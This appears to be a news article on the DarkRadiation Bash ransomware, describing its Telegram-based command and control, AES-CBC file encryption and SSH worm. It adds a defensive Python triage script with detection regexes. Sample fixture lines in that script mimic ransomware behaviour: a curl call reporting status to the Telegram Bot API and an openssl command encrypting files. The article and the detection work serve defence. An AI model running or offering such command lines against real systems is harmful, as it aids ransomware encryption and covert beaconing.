Cybersecurity experts have alerted the public to a new ransomware variant identified as “DarkRadiation,” which operates entirely within Bash. This strain specifically targets Linux and Docker cloud environments, utilizing the messaging platform Telegram for its command-and-control communications.

According to Trend Micro’s latest report, DarkRadiation is crafted in Bash and aims at Red Hat/CentOS and Debian distributions. The malware employs OpenSSL’s AES algorithm in CBC mode to encrypt files across various system directories. Additionally, it leverages the Telegram API for reporting its infection status to the attackers.

At present, details on how this ransomware is initially delivered remain scarce, and there is no confirmed evidence of its deployment in actual cyber incidents. The intelligence regarding DarkRadiation emerged from an investigation of hacker tools hosted on an unidentified threat actor’s infrastructure, specifically at an IP address linked to a directory labeled “api_attack.” The malicious toolset was first uncovered by a social media user on May 28.

DarkRadiation executes a multi-staged infection process, notable for its significant reliance on Bash scripting for malware retrieval and file encryption. The Telegram API is employed to maintain communication with the command-and-control server, utilizing hardcoded API keys. According to cybersecurity analyses, the ransomware is actively under development, featuring obfuscation techniques that employ an open-source tool named “node-bash-obfuscate” to fragment the code and assign aliases to each segment.

When launched, DarkRadiation first checks whether it is running as root, then uses those elevated permissions to download the tools it depends on, such as Wget, cURL, and OpenSSL. Every five seconds it takes a snapshot of the users logged in to the system and sends that information to an attacker-controlled server via the Telegram API.

If the necessary libraries are not found, the ransomware attempts to install them using YUM (Yellowdog Updater, Modified), the package manager widely used on Linux distributions such as Red Hat and CentOS. In its final stages, DarkRadiation enumerates the users on the compromised system, overwrites their passwords with “megapassword,” and removes all users with shell access, then creates a new user named “ferrum” with a hardcoded password that is used for the encryption process.

SentinelOne’s analysis highlights variations in the ransomware’s behavior: the password for the “ferrum” user may be either hardcoded or downloaded from the command-and-control server. Notably, the ransomware appends a radioactive symbol (‘.☢’) to each encrypted file. An accompanying SSH worm accepts its credential configuration as a base64-encoded argument, which it uses to connect to targeted systems over SSH and initiate the ransomware download.

In addition to reporting the execution status and encryption key back to the attackers, DarkRadiation can stop all running Docker containers on infected machines before displaying a ransom note to the victim. As SentinelOne researchers note, writing malware in a shell language such as Bash gives its developers more flexibility, since changes can be iterated quickly without recompilation. That agility may also help attackers evade detection, because some security products rely on static file signatures, which frequent updates can defeat.
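The indicators described in the preceding paragraphs (the ‘☢’ suffix on encrypted files, the “ferrum” account, Telegram Bot API calls from a shell script, and OpenSSL AES-CBC invocations) lend themselves to a simple host-triage check. The following script is an added illustration written for this article, not tooling from Trend Micro or SentinelOne; the regular expressions are assumptions about how those indicators would appear, and every sample input (file list, passwd entries, script text) is constructed rather than captured from a real infection.

```python
"""Host-triage checks for the DarkRadiation indicators named in the article.

Added example, not vendor tooling. The patterns below are assumptions about
how the indicators would appear on a host; sample inputs are constructed.
"""
import re
from dataclasses import dataclass, field

RADIOACTIVE_SUFFIX = "\u2622"        # '☢', appended to encrypted files
ROGUE_ACCOUNT = "ferrum"             # account the ransomware creates
# Telegram Bot API endpoint used for status reporting (assumed pattern)
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)
# openssl enc with an AES-CBC cipher, as used for file encryption (assumed pattern)
OPENSSL_AES_CBC = re.compile(
    r"\bopenssl\s+enc\b[^\n]*-aes-(128|192|256)-cbc", re.IGNORECASE)


@dataclass
class TriageReport:
    encrypted_files: list = field(default_factory=list)
    rogue_accounts: list = field(default_factory=list)
    telegram_c2: bool = False
    aes_cbc_encryption: bool = False

    @property
    def suspicious(self) -> bool:
        return bool(self.encrypted_files or self.rogue_accounts
                    or self.telegram_c2 or self.aes_cbc_encryption)


def find_encrypted_files(paths):
    """Return the paths that carry the '☢' suffix the ransomware appends."""
    return [p for p in paths if p.endswith(RADIOACTIVE_SUFFIX)]


def find_rogue_accounts(passwd_text):
    """Return (name, uid, shell) for any 'ferrum' entry in /etc/passwd content."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or line.startswith("#"):
            continue  # malformed or comment line; not a passwd record
        name, uid, shell = fields[0], fields[2], fields[6]
        if name == ROGUE_ACCOUNT:
            hits.append((name, int(uid), shell))
    return hits


def scan_script(script_text):
    """Flag Telegram Bot API use and AES-CBC openssl calls in shell script text."""
    return (bool(TELEGRAM_BOT_API.search(script_text)),
            bool(OPENSSL_AES_CBC.search(script_text)))


def triage(paths, passwd_text, script_text):
    """Combine the three checks into one report for a host."""
    report = TriageReport()
    report.encrypted_files = find_encrypted_files(paths)
    report.rogue_accounts = find_rogue_accounts(passwd_text)
    report.telegram_c2, report.aes_cbc_encryption = scan_script(script_text)
    return report


# Constructed sample inputs (not captured from a real infection)
SAMPLE_PATHS = [
    "/home/alice/report.docx\u2622",
    "/var/lib/docker/volumes/db.sqlite\u2622",
    "/etc/hostname",
]
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
    "ferrum:x:1001:1001::/home/ferrum:/bin/bash\n"
)
SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    'curl -s "https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendMessage" -d "text=started"\n'
    'openssl enc -aes-256-cbc -in "$f" -out "$f\u2622"\n'
)
BENIGN_SCRIPT = "#!/bin/bash\ntar czf backup.tgz /etc\n"

if __name__ == "__main__":
    print(triage(SAMPLE_PATHS, SAMPLE_PASSWD, SAMPLE_SCRIPT))
```

In practice the inputs would come from a filesystem walk, the host’s /etc/passwd, and any shell scripts found in temporary or home directories; the functions are kept separate so each indicator can be wired into an existing EDR or audit job on its own.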

As the cybersecurity landscape evolves, understanding attacks like DarkRadiation is crucial for business owners to bolster defenses and protect sensitive data. The techniques deployed in this ransomware assault are indicative of a broader trend where adversary tactics—including initial access and privilege escalation—are becoming increasingly sophisticated and challenging to mitigate.
